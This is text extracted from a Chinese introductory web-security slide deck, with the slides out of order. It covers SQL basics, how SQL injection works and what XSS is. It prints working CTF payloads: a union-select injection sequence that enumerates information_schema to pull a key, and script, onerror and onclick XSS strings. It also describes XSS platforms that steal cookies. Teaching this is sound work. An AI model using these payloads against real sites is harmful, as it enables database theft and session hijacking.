二、漏洞分析之XSS(Cross Site Scripting)
XSS平台
• 获取COOKIE(这是必须的最基本的功能) • 时时通信(受害者在线的情况下是与XSS平台时时连接的,攻击者可发送
命令。） • 执行自定义JS(可自己写JS让受害者执行) 。 。
学习资源
《XSS跨站脚本攻击剖析与防御》 《精通JavaScript》 挑战关卡：http://xss-quiz.int21h.jp
学习资源 《SQL注入攻击与防御》 Sqli-labs 地址：https:///Audi-1/sqli-labs 教程：/course/index/video/id/54
9
Web漏洞
二、漏洞分析之SQL注入
CTF（/main.php）
16
Web漏洞
二、漏洞分析之XSS(Cross Site Scripting)
CTF(/main.php)
• XSS 50 <script>alert(HackingLab)</script> • XSS 100 '><img src=1 onerror=alert(HackingLab)><' • XSS 130 ' onclick=al&#x65;rt(HackingLab) value=s Site Scripting)
什么是XSS跨站脚本
一图胜千言
12
Web漏洞
二、漏洞分析之XSS(Cross Site Scripting)
什么是XSS跨站脚本
一图胜千言
13
Web漏洞
二、漏洞分析之XSS(Cross Site Scripting)
union select 1,(select group_concat(column_name)
from
information_schema.columns where table_name='sae_user_sqli3'),3--+
⑤ 获取key
union select 1,group_concat(content),3 from sae_user_sqli3--+
• 简单的注入
① 判断字段数 order by 3
② 获取数据库名、版本 union select 1,database(),3--+
③ 获取表名 union select 1,(select group_concat(table_name) from
information_schema.tables where table_schema=database()),3--+ ④ 获取列名
14
Web漏洞
二、漏洞分析之XSS(Cross Site Scripting)
XSS分类
• 反射性 • 存储型
实例分析
http://192.168.219.129/study/Xss/test.html http://192.168.219.129/study/Xss/xss.php
15
Web漏洞
Web安全初探
1
一、Web 二、Web漏洞 三、入门
2
Web
3
Web
一、从B/S架构说起 B/S架构（Browser/Server，浏览器/服务器模式）
4
Web
二、一个Web程序的执行过程 1.组成部分
服务器：硬件+软件（操作系统+Web容器） 语言 ：asp、php、aspx 数据库：access、mysql、sqlserver
SQL语言
SQL一般指结构化的查询语言，主要用来对数据库进行查询、修改、及数 据库表的修改等相关操作。常用的语句语句有：select，insert，update， delete等。
7
Web漏洞
二、漏洞分析之SQL注入
注入原理
当我们浏览网页的时候，会向服务器传递参数，所要传递的参数可能通 过GET或POST方式。GET为显式传参，即所传递的参数会在url上显示；
POST为隐式传参，即在url上不能看到所传递的参数。
Burpsuit分析参数传递过程。
8
Web漏洞
二、漏洞分析之SQL注入
实例分析 http://192.168.219.129/study/sql_injection/sqli.php
① 爆错 ② 构造注入框架 ③ 构造payload
注入工具 Sqlmap
10
Web漏洞
二、漏洞分析之XSS(Cross Site Scripting)
什么是XSS跨站脚本
XSS是一种经常出现在web应用中的计算机安全漏洞，它允许恶意web用户 将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码 和客户端脚本。攻击者可以利用XSS漏洞获取一定的权限。这种类型的漏 洞由于被黑客用来编写危害性更大的蠕虫病毒，对网络造成巨大损失。对 于跨站脚本攻击，黑客界共识是：跨站脚本攻击是新型的“缓冲区溢出攻 击“，而JavaScript是新型的“ShellCode”。 由于和另一种网页技术--层叠样式表（Cascading Style Sheets,CSS）的缩 写一样，为了防止混淆，故把原本的CSS检称为XSS。
2.Hello World
/*Hello World 程序演示*/
5
Web漏洞
一、漏洞种类 SQL注入、XSS、目录遍历、权限绕过、弱口令.......
6
Web漏洞
二、漏洞分析之SQL注入
数据库基础
所谓数据库，即数据存储的仓库，通常用二维的数据表来存储数据，数据 表的每一列称为一个字段，每一行称为一条记录，通过SQL查询语句可以 对数据进行查询、增加、删除、修改等操作。
JavaScript基础
JavaScript是一种属于网络的脚本语言,已经被广泛用于Web应用开发,常用 来为网页添加各式各样的动态功能,为用户提供更流畅美观的浏览效果。通 常JavaScript脚本是通过嵌入在HTML中来实现自身的功能的。
Cookie（储存在用户本地终端上的数据）
服务器可以利用Cookies的包含信息来判断在HTTP传输中的状态， Cookies最典型的应用是判定用户是否已经登录网站，用户可能会得到提示， 是否在下一次进入此网站时保留用户信息以便简化登录手续。